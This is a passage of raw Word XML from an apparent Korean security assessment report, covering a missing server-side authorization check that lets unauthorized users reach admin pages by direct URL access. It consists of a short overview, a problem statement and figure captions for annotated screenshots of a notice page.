          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 글에 대해서 악성 링크나 광고성 패턴을 탐지하는 콘텐츠 필터링 기능을 추가</w:t>
      </w:r>
      <w:r w:rsidR="003C6C3E">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>해야 합니다.</w:t>
      </w:r>
      <w:r w:rsidR="00BE3695">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AFBBD62" w14:textId="22C1A540" w:rsidR="00BE3695" w:rsidRDefault="00231B8E" w:rsidP="00BE3695">
      <w:pPr>
        <w:pStyle w:val="Level3TitleCtl3"/>
      </w:pPr>
      <w:bookmarkStart w:id="436" w:name="_Toc209094567"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>프로세스 검증 누락</w:t>
      </w:r>
      <w:bookmarkEnd w:id="436"/>
    </w:p>
    <w:p w14:paraId="069D42A1" w14:textId="77777777" w:rsidR="00BE3695" w:rsidRDefault="00BE3695" w:rsidP="00BE3695">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>개요</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A11CEC9" w14:textId="3ABFCAAE" w:rsidR="00BE3695" w:rsidRPr="00B5070A" w:rsidRDefault="005D7449" w:rsidP="002C3BB3">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">서버 측 검증 프로세스 부재로 비인가자가 </w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">URL </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>직접 접근 및 파라미터 조작으로 중요정보 혹은 민감한 정보에 접근할 수 있는 취약점입니다.</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB28F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>클라이언트</w:t>
      </w:r>
      <w:r w:rsidR="00BB28F2">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidR="00BB28F2">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>측에 의존하는 스크립트 혹은 페이지별 권한 체크 누락으로 인해 취약점이 생길 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7836ECFA" w14:textId="77777777" w:rsidR="00BE3695" w:rsidRDefault="00BE3695" w:rsidP="00BE3695">
      <w:pPr>
        <w:pStyle w:val="aa"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="6E2E2B9A" w14:textId="77777777" w:rsidR="00BE3695" w:rsidRPr="00CB22A6" w:rsidRDefault="00BE3695" w:rsidP="00BE3695">
      <w:pPr>
        <w:pStyle w:val="Level4TitleCtl4"/>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
          <w:b/>
        </w:rPr>
        <w:t>문제점</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2F772CA6" w14:textId="2438EC94" w:rsidR="00A76CE7" w:rsidRDefault="002F46C8" w:rsidP="00A76CE7">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="002F46C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t>일반</w:t>
      </w:r>
      <w:r w:rsidRPr="002F46C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 사용자나 비로그인 상태에서도 관리자</w:t>
      </w:r>
      <w:r w:rsidR="00874EBA">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="002F46C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>페이지에 접근</w:t>
      </w:r>
      <w:r w:rsidR="002E1D07">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia" w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve">할 수 있는 </w:t>
      </w:r>
      <w:r w:rsidRPr="002F46C8">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
        <w:t>경우, 공격자가 게시물 위·변조, 불법 게시글 등록 등의 보안 위협으로 이어질 수 있습니다.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25EC158E" w14:textId="77777777" w:rsidR="00A76CE7" w:rsidRDefault="00A76CE7" w:rsidP="00A76CE7">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="290AFFFF" w14:textId="0D9BD516" w:rsidR="00A76CE7" w:rsidRPr="00A76CE7" w:rsidRDefault="00836DD2" w:rsidP="00A76CE7">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251750400" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="43EC436B" wp14:editId="38267690">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3255009</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>980440</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1422400" cy="1363345"/>
                <wp:effectExtent l="38100" t="0" r="25400" b="65405"/>
                <wp:wrapNone/>
                <wp:docPr id="1444393997" name="직선 화살표 연결선 1444393997"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvCnPr/>
                      <wps:spPr>
                        <a:xfrm flipH="1">
                          <a:off x="0" y="0"/>
                          <a:ext cx="1422400" cy="13633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48DEE" id="직선 화살표 연결선 1444393997" o:spid="_x0000_s1026" type="#_x0000_t32" style="position:absolute;left:0;text-align:left;margin-left:256.3pt;margin-top:77.2pt;width:112pt;height:107.3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PBKQIAAGIEAAAOAAAAZHJzL2Uyb0RvYy54bWysVMuO0zAU3SPxD5b3TNI2M9Cq6Sw6FBYI&#10;Kh4f4Dp2Yskv2aZplyB+AAlphMSCHdsR4qtQ5x+4dtIwPIQEIgsrtu8599xzbzI/3ymJtsx5YXSJ&#10;Ryc5RkxTUwldl/jF89Wdexj5QHRFpNGsxHvm8fni9q15a2dsbBojK+YQkGg/a22JmxDsLMs8bZgi&#10;/sRYpuGSG6dIgK2rs8qRFtiVzMZ5fpa1xlXWGcq8h9OL7hIvEj/njIYnnHsWkCwxaAtpdWndxDVb&#10;zMmsdsQ2gvYyyD+oUERoSDpQXZBA0EsnfqFSgjrjDQ8n1KjMcC4oSzVANaP8p2qeNcSyVAuY4+1g&#10;k/9/tPTxdu2QqKB3RVFMppPp9C5Gmijo1eHTq8Obj+j6/bvD6y/Xbz+gw+XV189X8exGMDjYWj8D&#10;oqVeu37n7dpFO3bcKcSlsA8hQTIISka75P9+8J/tAqJwOCrG4yKHNlG4G03OJpPiNHYo64gioXU+&#10;PGBGofhSYh8cEXUTlkZr6LVxXRKyfeRDBzwCIlhq1ALxND/NkxZvpKhWQsp46V29WUqHtgRGZbXK&#10;4elz/xAWiJD3dYXC3oJFwQmia8n6SKlBbHSjqz+9hb1kXfKnjIPTsc4ue5xxNqQklDIdRgMTREcY&#10;B3kDsJf9J2AfH6Eszf/fgAdEymx0GMBKaON+JzvsjpJ5F390oKs7WrAx1T5NRrIGBjl1tP/o4pdy&#10;c5/g338Ni28AAAD//wMAUEsDBBQABgAIAAAAIQCMBNGf3wAAAAsBAAAPAAAAZHJzL2Rvd25yZXYu&#10;eG1sTI/BToNAEIbvJr7DZky82YWWokWWxjSaem3tA2zZEQjsLLJLoW/veLLHmf/LP9/k29l24oKD&#10;bxwpiBcRCKTSmYYqBaevj6cXED5oMrpzhAqu6GFb3N/lOjNuogNejqESXEI+0wrqEPpMSl/WaLVf&#10;uB6Js283WB14HCppBj1xue3kMopSaXVDfKHWPe5qLNvjaBWU+71p5346/bRj0h3k+3UTf+6UenyY&#10;315BBJzDPwx/+qwOBTud3UjGi07BOl6mjHKwThIQTDyvUt6cFazSTQyyyOXtD8UvAAAA//8DAFBL&#10;AQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBl&#10;c10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxz&#10;Ly5yZWxzUEsBAi0AFAAGAAgAAAAhAMdoU8EpAgAAYgQAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9l&#10;Mm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAIwE0Z/fAAAACwEAAA8AAAAAAAAAAAAAAAAAgwQAAGRy&#10;cy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAACPBQAAAAA=&#10;" strokecolor="red" strokeweight="1.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4475206E" wp14:editId="369F4FF9">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>4457065</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>764540</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="429318" cy="173124"/>
                <wp:effectExtent l="0" t="0" r="27940" b="17780"/>
                <wp:wrapNone/>
                <wp:docPr id="1444393995" name="직사각형 1444393995"/>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F217" id="직사각형 1444393995" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:350.95pt;margin-top:60.2pt;width:33.8pt;height:13.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WiuAIAAKMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVM1u1DAQviPxDpbvNMn+UDZqtlq1WoRU&#10;tRUt6tnr2JtIjm1s72aXW3kHJN6ACweeC5V3YGwn6apUHBA5OLZn5hvPNz8np7tGoC0ztlaywNlR&#10;ihGTVJW1XBf4w+3y1RuMrCOyJEJJVuA9s/h0/vLFSatzNlKVEiUzCECkzVtd4Mo5nSeJpRVriD1S&#10;mkkQcmUa4uBo1klpSAvojUhGafo6aZUptVGUWQu351GI5wGfc0bdFeeWOSQKDG9zYTVhXfk1mZ+Q&#10;fG2IrmraPYP8wysaUktwOkCdE0fQxtR/QDU1Ncoq7o6oahLFeU1ZiAGiydIn0dxURLMQC5Bj9UCT&#10;/X+w9HJ7bVBdQu4mk8l4Np7NphhJ0kCuHr7dP3z+/vPH/a+vX9CBGDhrtc3B9EZfm+5kYesJ2HHT&#10;+D+EhnaB5/3AM9s5ROFyMpqNMygMCqLseJyNJj4PyaOxNta9ZapBflNgA2kM7JLthXVRtVfxvqRa&#10;1kLAPcmFRC2AztJpGiysEnXppV5ozXp1JgzaEqiG5TKFr3N8oAbPEBJe40OMQYWd2wsWHbxnHAiD&#10;MEbRgy9VNsASSpl0WRRVpGTR2/TQWW8RYhYSAD0yh1cO2B1ArxlBeuzIQKfvTVmo9MG4C/1vxoNF&#10;8KykG4ybWirzXGQCouo8R/2epEiNZ2mlyj2Uk1Gxz6ymyxoyeEGsuyYGGgtaEIaFu4KFCwWZUt0O&#10;o0qZT8/de32od5Bi1EKjFth+3BDDMBLvJHTCDCrTd3Y4TKbHIziYQ8nqUCI3zZmC7GcwljQNW6/v&#10;RL/lRjV3MFMW3iuIiKTgu8DUmf5w5uIAgalE2WIR1KCbNXEX8kZTD+5Z9RV6u7sjRndl7KD+L1Xf&#10;1CR/Us1R11tKtdg4xetQ6o+8dnzDJAiF000tP2oOz0HrcbbOfwMAAP//AwBQSwMEFAAGAAgAAAAh&#10;AKhZ4hXgAAAACwEAAA8AAABkcnMvZG93bnJldi54bWxMj8FOwzAMhu9IvENkJG4sWTSWrTSdAAkh&#10;0A4wtnvWZm21xKmarC1vjznB0f4//f6cbybv2GD72AbUMJ8JYBbLULVYa9h/vdytgMVksDIuoNXw&#10;bSNsiuur3GRVGPHTDrtUMyrBmBkNTUpdxnksG+tNnIXOImWn0HuTaOxrXvVmpHLvuBRiyb1pkS40&#10;prPPjS3Pu4vX8BHOJ+4OUr6rp1ep3vxqrIet1rc30+MDsGSn9AfDrz6pQ0FOx3DBKjKnQYn5mlAK&#10;pFgAI0It1/fAjrRZKAW8yPn/H4ofAAAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAAT&#10;AAAAAAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/W&#10;AAAAlAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAMomFaK4&#10;AgAAowUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAKhZ&#10;4hX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737088" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="66A7B166" wp14:editId="18CBDF3F">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3016885</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>2410460</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="429318" cy="173124"/>
                <wp:effectExtent l="0" t="0" r="27940" b="17780"/>
                <wp:wrapNone/>
                <wp:docPr id="1444393996" name="직사각형 1444393996"/>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71435" id="직사각형 1444393996" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:237.55pt;margin-top:189.8pt;width:33.8pt;height:1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QOuQIAAKMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtu2zAQ3RfoHQjuG0m2k9RC5MBI4KJA&#10;kARNiqxpirQEUCRL0pbdXXqHAL1BN130XEV6hw5JSTHSoIuiWlAkZ+YN583n5HTbCLRhxtZKFjg7&#10;SDFikqqylqsCf7xdvHmLkXVElkQoyQq8Yxafzl6/Oml1zkaqUqJkBgGItHmrC1w5p/MksbRiDbEH&#10;SjMJQq5MQxwczSopDWkBvRHJKE2PklaZUhtFmbVwex6FeBbwOWfUXXFumUOiwPA2F1YT1qVfk9kJ&#10;yVeG6Kqm3TPIP7yiIbUEpwPUOXEErU39B1RTU6Os4u6AqiZRnNeUhRggmix9Fs1NRTQLsQA5Vg80&#10;2f8HSy831wbVJeRuMpmMp+Pp9AgjSRrI1eO3+8cv33/+uP/19QHtiYGzVtscTG/0telOFraegC03&#10;jf9DaGgbeN4NPLOtQxQuJ6PpOIPCoCDKjsfZaOLzkDwZa2PdO6Ya5DcFNpDGwC7ZXFgXVXsV70uq&#10;RS0E3JNcSNQC6DQ9TIOFVaIuvdQLrVktz4RBGwLVsFik8HWO99TgGULCa3yIMaiwczvBooMPjANh&#10;EMYoevClygZYQimTLouiipQsejvcd9ZbhJiFBECPzOGVA3YH0GtGkB47MtDpe1MWKn0w7kL/m/Fg&#10;ETwr6QbjppbKvBSZgKg6z1G/JylS41laqnIH5WRU7DOr6aKGDF4Q666JgcaCFoRh4a5g4UJBplS3&#10;w6hS5vNL914f6h2kGLXQqAW2n9bEMIzEewmdMIXK9J0dDpPD4xEczL5kuS+R6+ZMQfYzGEuahq3X&#10;d6LfcqOaO5gpc+8VRERS8F1g6kx/OHNxgMBUomw+D2rQzZq4C3mjqQf3rPoKvd3eEaO7MnZQ/5eq&#10;b2qSP6vmqOstpZqvneJ1KPUnXju+YRKEwummlh81++eg9TRbZ78BAAD//wMAUEsDBBQABgAIAAAA&#10;IQBi4NLW4QAAAAsBAAAPAAAAZHJzL2Rvd25yZXYueG1sTI/BTsMwEETvSPyDtUjcqFPTxm2IUwES&#10;QlQcoC13N3GTqPY6it0k/D3LCY6reZp5m28mZ9lg+tB6VDCfJcAMlr5qsVZw2L/crYCFqLHS1qNR&#10;8G0CbIrrq1xnlR/x0wy7WDMqwZBpBU2MXcZ5KBvjdJj5ziBlJ987Hensa171eqRyZ7lIkpQ73SIt&#10;NLozz40pz7uLU/Dhzyduv4TYyqdXId/caqyHd6Vub6bHB2DRTPEPhl99UoeCnI7+glVgVsFCLueE&#10;KriX6xQYEcuFkMCOFCXpGniR8/8/FD8AAAD//wMAUEsBAi0AFAAGAAgAAAAhALaDOJL+AAAA4QEA&#10;ABMAAAAAAAAAAAAAAAAAAAAAAFtDb250ZW50X1R5cGVzXS54bWxQSwECLQAUAAYACAAAACEAOP0h&#10;/9YAAACUAQAACwAAAAAAAAAAAAAAAAAvAQAAX3JlbHMvLnJlbHNQSwECLQAUAAYACAAAACEAQ7Gk&#10;DrkCAACjBQAADgAAAAAAAAAAAAAAAAAuAgAAZHJzL2Uyb0RvYy54bWxQSwECLQAUAAYACAAAACEA&#10;YuDS1uEAAAALAQAADwAAAAAAAAAAAAAAAAATBQAAZHJzL2Rvd25yZXYueG1sUEsFBgAAAAAEAAQA&#10;8wAAACEGAAAAAA==&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r w:rsidR="00A76CE7">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="3AF3B064" wp14:editId="60403AEB">
            <wp:extent cx="4572000" cy="3938257"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="24765"/>
            <wp:docPr id="1444393994" name="그림 144439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DCE47B" w14:textId="17E0209F" w:rsidR="006739DD" w:rsidRDefault="00A76CE7" w:rsidP="006739DD">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="437" w:name="_Toc209094639"/>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66</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r w:rsidR="003F4B2F">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>고객센터</w:t>
      </w:r>
      <w:r w:rsidR="003F4B2F">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 내 </w:t>
      </w:r>
      <w:r w:rsidR="003F4B2F">
        <w:t>“</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공지사항</w:t>
      </w:r>
      <w:r w:rsidR="003F4B2F">
        <w:t>”</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t xml:space="preserve"> 페이지</w:t>
      </w:r>
      <w:bookmarkEnd w:id="437"/>
    </w:p>
    <w:p w14:paraId="244C34AA" w14:textId="77777777" w:rsidR="006739DD" w:rsidRDefault="006739DD" w:rsidP="006739DD">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="18342EC9" w14:textId="49D1F243" w:rsidR="006739DD" w:rsidRPr="006739DD" w:rsidRDefault="006739DD" w:rsidP="006739DD">
      <w:pPr>
        <w:pStyle w:val="a9"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorEastAsia" w:hAnsiTheme="minorEastAsia"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251705344" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="1647D0E1" wp14:editId="1B212AB5">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>3817620</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1206500</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="637309" cy="180109"/>
                <wp:effectExtent l="0" t="0" r="10795" b="10795"/>
                <wp:wrapNone/>
                <wp:docPr id="1444394003" name="직사각형 1444394003"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
                          <a:ext cx="637309"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3131C" id="직사각형 1444394003" o:spid="_x0000_s1026" style="position:absolute;left:0;text-align:left;margin-left:300.6pt;margin-top:95pt;width:50.2pt;height:1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ZQtwIAAKMFAAAOAAAAZHJzL2Uyb0RvYy54bWysVEtu2zAQ3RfoHQjuG8mffCxEDowELgoE&#10;SdCkyJqmSFsAxWFJ2rK7S+9QoDfopoueq0jv0CH1iZEGXRTVgiI5M284bz6nZ9tKkY2wrgSd08FB&#10;SonQHIpSL3P64W7+5oQS55kumAItcroTjp5NX786rU0mhrACVQhLEES7rDY5XXlvsiRxfCUq5g7A&#10;CI1CCbZiHo92mRSW1YheqWSYpkdJDbYwFrhwDm8vGiGdRnwpBffXUjrhicopvs3H1cZ1EdZkesqy&#10;pWVmVfL2GewfXlGxUqPTHuqCeUbWtvwDqiq5BQfSH3CoEpCy5CLGgNEM0mfR3K6YETEWJMeZnib3&#10;/2D51ebGkrLA3I3H49FknKYjSjSrMFeP3x4eP3//+ePh19cvZE+MnNXGZWh6a25se3K4DQRspa3C&#10;H0Mj28jzrudZbD3heHk0Oh6lE0o4igYnGPck5CF5MjbW+bcCKhI2ObWYxsgu21w636h2KsGXhnmp&#10;FN6zTGlSI+gkPUyjhQNVFkEahM4uF+fKkg3DapjPU/xax3tq+Ayl8TUhxCaouPM7JRoH74VEwjCM&#10;YeMhlKroYRnnQvtBI1qxQjTeDveddRYxZqURMCBLfGWP3QJ0mg1Ih90w0OoHUxErvTduQ/+bcW8R&#10;PYP2vXFVarAvRaYwqtZzo9+R1FATWFpAscNystD0mTN8XmIGL5nzN8xiY2EL4rDw17hIBZgpaHeU&#10;rMB+euk+6GO9o5SSGhs1p+7jmllBiXqnsRMmWJmhs+NhfHg8xIPdlyz2JXpdnQNmf4BjyfC4Dfpe&#10;dVtpobrHmTILXlHENEffOeXedodz3wwQnEpczGZRDbvZMH+pbw0P4IHVUKF323tmTVvGHuv/Crqm&#10;Ztmzam50g6WG2dqDLGOpP/Ha8o2TIBZOO7XCqNk/R62n2Tr9DQAA//8DAFBLAwQUAAYACAAAACEA&#10;g0OPuN4AAAALAQAADwAAAGRycy9kb3ducmV2LnhtbEyPQUvEMBCF74L/IYzgzU0apK216aKCiOJB&#10;V71nm2xbNpmUJtvWf+940uPwPt58r96u3rHZTnEIqCDbCGAW22AG7BR8fjxelcBi0mi0C2gVfNsI&#10;2+b8rNaVCQu+23mXOkYlGCutoE9prDiPbW+9jpswWqTsECavE51Tx82kFyr3jkshcu71gPSh16N9&#10;6G173J28grdwPHD3JeVLcf8ki2dfLt38qtTlxXp3CyzZNf3B8KtP6tCQ0z6c0ETmFOQik4RScCNo&#10;FBGFyHJgewUyK6+BNzX/v6H5AQAA//8DAFBLAQItABQABgAIAAAAIQC2gziS/gAAAOEBAAATAAAA&#10;AAAAAAAAAAAAAAAAAABbQ29udGVudF9UeXBlc10ueG1sUEsBAi0AFAAGAAgAAAAhADj9If/WAAAA&#10;lAEAAAsAAAAAAAAAAAAAAAAALwEAAF9yZWxzLy5yZWxzUEsBAi0AFAAGAAgAAAAhAA5i5lC3AgAA&#10;owUAAA4AAAAAAAAAAAAAAAAALgIAAGRycy9lMm9Eb2MueG1sUEsBAi0AFAAGAAgAAAAhAINDj7je&#10;AAAACwEAAA8AAAAAAAAAAAAAAAAAEQUAAGRycy9kb3ducmV2LnhtbFBLBQYAAAAABAAEAPMAAAAc&#10;BgAAAAA=&#10;" filled="f" strokecolor="red" strokeweight="1.5pt"/>
            </w:pict>
          </mc:Fallback>
        </mc:AlternateContent>
      </w:r>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="080F2BFE" wp14:editId="6270135B">
            <wp:extent cx="4572000" cy="1560203"/>
            <wp:effectExtent l="19050" t="19050" r="19050" b="20955"/>
            <wp:docPr id="1444394000" name="그림 14443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8902" r="2332" b="11470"/>
                    <a:stretch/>
                  </pic:blipFill>
                  <pic:spPr bwMode="auto">
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="4572000" cy="15602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28D84A" w14:textId="76CA70C9" w:rsidR="00F44FCD" w:rsidRDefault="006739DD" w:rsidP="00F44FCD">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:bookmarkStart w:id="438" w:name="_Toc20909464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67</w:t>
      </w:r>
      <w:r w:rsidR="0041664A">
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:fldChar w:fldCharType="end"/>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">. </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>공지사항 페이지 소스 확</w:t>
      </w:r>
      <w:r w:rsidR="00A82987">
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>인</w:t>
      </w:r>
      <w:bookmarkEnd w:id="438"/>
    </w:p>
    <w:p w14:paraId="4EF50373" w14:textId="2A678E0F" w:rsidR="00F44FCD" w:rsidRDefault="000C5CC5" w:rsidP="00F44FCD">
      <w:pPr>
        <w:pStyle w:val="a9"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:noProof/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <mc:AlternateContent>
          <mc:Choice Requires="wps">
            <w:drawing>
              <wp:anchor distT="0" distB="0" distL="114300" distR="114300" simplePos="0" relativeHeight="251755520" behindDoc="0" locked="0" layoutInCell="1" allowOverlap="1" wp14:anchorId="75705BE7" wp14:editId="00A36D58">
                <wp:simplePos x="0" y="0"/>
                <wp:positionH relativeFrom="column">
                  <wp:posOffset>2184400</wp:posOffset>
                </wp:positionH>
                <wp:positionV relativeFrom="paragraph">
                  <wp:posOffset>1210310</wp:posOffset>
                </wp:positionV>
                <wp:extent cx="1122219" cy="117763"/>
                <wp:effectExtent l="0" t="0" r="20955" b="15875"/>
                <wp:wrapNone/>
                <wp:docPr id="1444394006" name="직사각형 1444394006"/>
                <wp:cNvGraphicFramePr/>
                <a:graphic xmlns:a="http://schemas.openxmlformats.org/drawingml/2006/main">
                  <a:graphicData uri="http://schemas.microsoft.com/office/word/2010/wordprocessingShape">
                    <wps:wsp>
                      <wps:cNvSpPr/>
                      <wps:spPr>
                        <a:xfrm>
                          <a:off x="0" y="0"/>
